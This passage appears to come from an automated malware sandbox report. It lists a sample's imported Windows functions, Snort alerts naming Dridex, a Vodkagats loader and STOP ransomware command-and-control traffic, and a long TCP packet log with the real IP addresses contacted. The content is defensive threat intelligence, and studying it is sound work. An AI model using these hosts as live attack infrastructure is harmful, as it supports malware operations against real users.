                                                                                                                                                  KERNEL32.dllLocalUnlock, SetDefaultCommConfigA, GlobalDeleteAtom, OpenFile, GetConsoleAliasesLengthW, EnumDateFormatsExW, CopyFileExW, MoveFileExA, SetEndOfFile, WriteConsoleOutputW, CreateJobObjectW, HeapFree, GlobalAlloc, LoadLibraryW, IsProcessInJob, DnsHostnameToComputerNameW, GetTimeFormatW, GetModuleFileNameW, GetCompressedFileSizeA, lstrcatA, SetConsoleTitleA, VirtualUnlock, LCMapStringA, FreeLibraryAndExitThread, GetLastError, ChangeTimerQueueTimer, GetLongPathNameW, HeapSize, CreateNamedPipeA, SetVolumeLabelW, GetConsoleDisplayMode, EnterCriticalSection, SetFileAttributesA, BuildCommDCBW, GetTempFileNameA, GetAtomNameA, LoadLibraryA, OpenWaitableTimerW, GetModuleHandleA, FreeEnvironmentStringsW, VirtualProtect, CompareStringA, QueryPerformanceFrequency, DeleteCriticalSection, LocalFree, SetEnvironmentVariableA, CompareStringW, GetTimeZoneInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LeaveCriticalSection, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FatalAppExitA, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetStdHandle, GetModuleFileNameA, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, RtlUnwind, MultiByteToWideChar, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, InitializeCriticalSectionAndSpinCount, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, ReadFile, CreateFileA, CloseHandle, GetLocaleInfoW, RaiseException
                                                                                                                                                  USER32.dllGetMonitorInfoW, GetDesktopWindow

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  SetsuanaSouth Africa

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  192.168.2.11211.40.39.25149708802020826 01/11/24-13:35:01.763362TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4970880192.168.2.11211.40.39.251
                                                                                                                                                  192.168.2.11211.40.39.25149708802036333 01/11/24-13:35:01.763362TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4970880192.168.2.11211.40.39.251
                                                                                                                                                  192.168.2.11109.175.29.3949710802833438 01/11/24-13:35:01.710262TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4971080192.168.2.11109.175.29.39

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 11, 2024 13:34:55.931021929 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:55.931057930 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:55.931144953 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:55.945903063 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:55.945936918 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.153805017 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.153954029 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.245596886 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.245625019 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.246041059 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.246094942 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.250641108 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.293914080 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.640630960 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.640747070 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:56.640773058 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.640804052 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.642827034 CET49705443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:56.642858028 CET44349705172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:57.947381973 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:57.947431087 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:57.947632074 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:57.959218025 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:57.959233046 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.158632040 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.158907890 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.164496899 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.164513111 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.164769888 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.164839029 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.166979074 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.213917971 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.664676905 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.664731979 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.664767027 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.664815903 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:34:58.664829016 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.664860964 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.665057898 CET49706443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:34:58.665075064 CET44349706172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.196923971 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.196949959 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.197027922 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.206053019 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.206067085 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.403881073 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.403959036 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.409472942 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.409480095 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.409734964 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.409969091 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.419603109 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.461906910 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.886010885 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.886070967 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.886089087 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.886116982 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:00.886132002 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.886162043 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.886595011 CET49707443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:00.886607885 CET44349707172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.471612930 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:01.483788013 CET4970980192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.498680115 CET4971080192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.694837093 CET8049709109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.694927931 CET4970980192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.695245028 CET4970980192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.706958055 CET8049710109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.707036018 CET4971080192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.710262060 CET4971080192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.763021946 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.763108969 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:01.763361931 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:01.907439947 CET8049709109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.907515049 CET4970980192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.908127069 CET4970980192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.917073011 CET8049710109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:01.917217016 CET4971080192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:01.917217016 CET4971080192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:02.118206978 CET8049709109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:02.124280930 CET8049710109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:02.254817963 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.128504038 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.128541946 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.128624916 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.423928022 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.423995972 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.424010038 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.424038887 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.424050093 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.424086094 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.424101114 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.424138069 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.715915918 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.715981960 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.715982914 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716032982 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716182947 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716265917 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716305971 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716367006 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716406107 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716450930 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716483116 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716579914 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716614962 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716640949 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:03.716696024 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:03.716806889 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014262915 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014300108 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014319897 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014343023 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014365911 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014390945 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014410973 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014466047 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014544964 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014601946 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014657021 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014719963 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014770985 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014811993 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014833927 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014861107 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014874935 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014911890 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.014920950 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014981031 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.014995098 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.015048027 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.015074015 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.015146971 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.015163898 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.015213966 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.015244961 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.015295982 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.015337944 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.015388012 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.305655956 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305720091 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305761099 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305807114 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305809975 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.305850029 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.305859089 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305874109 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.305913925 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.305937052 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.305988073 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306001902 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306057930 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306117058 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306133986 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306154013 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306159019 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306183100 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306200027 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306231976 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306344986 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306391001 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306432962 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306476116 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306519032 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306574106 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306598902 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306672096 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306699991 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306745052 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306783915 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306828022 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306889057 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.306930065 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.306957006 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307003975 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307043076 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307087898 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307126999 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307168007 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307193041 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307229996 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307292938 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307342052 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307367086 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307405949 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307435989 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307476044 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307502031 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307548046 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307564974 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307625055 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307632923 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307651043 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307681084 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307697058 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307709932 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307756901 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307801962 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.307818890 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.307868004 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.597528934 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.597557068 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.597600937 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.597682953 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.597683907 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.597719908 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.597744942 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.597780943 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598052979 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598072052 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598083019 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598105907 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598145008 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598169088 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598221064 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598278046 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598315954 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598364115 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598381042 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598434925 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598470926 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598526955 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598563910 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598611116 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598649025 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598707914 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598721027 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598773003 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598819971 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598872900 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598892927 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.598944902 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.598994970 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599046946 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599052906 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599101067 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599138975 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599209070 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599219084 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599272013 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599292994 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599342108 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599361897 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599411011 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599446058 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599503040 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599507093 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599526882 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599565983 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599575996 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599652052 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599668980 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599721909 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599757910 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599776030 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599807024 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599822044 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599848032 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599864960 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599898100 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599910975 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.599922895 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.599983931 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.600011110 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.600033045 CET4970880192.168.2.11211.40.39.251
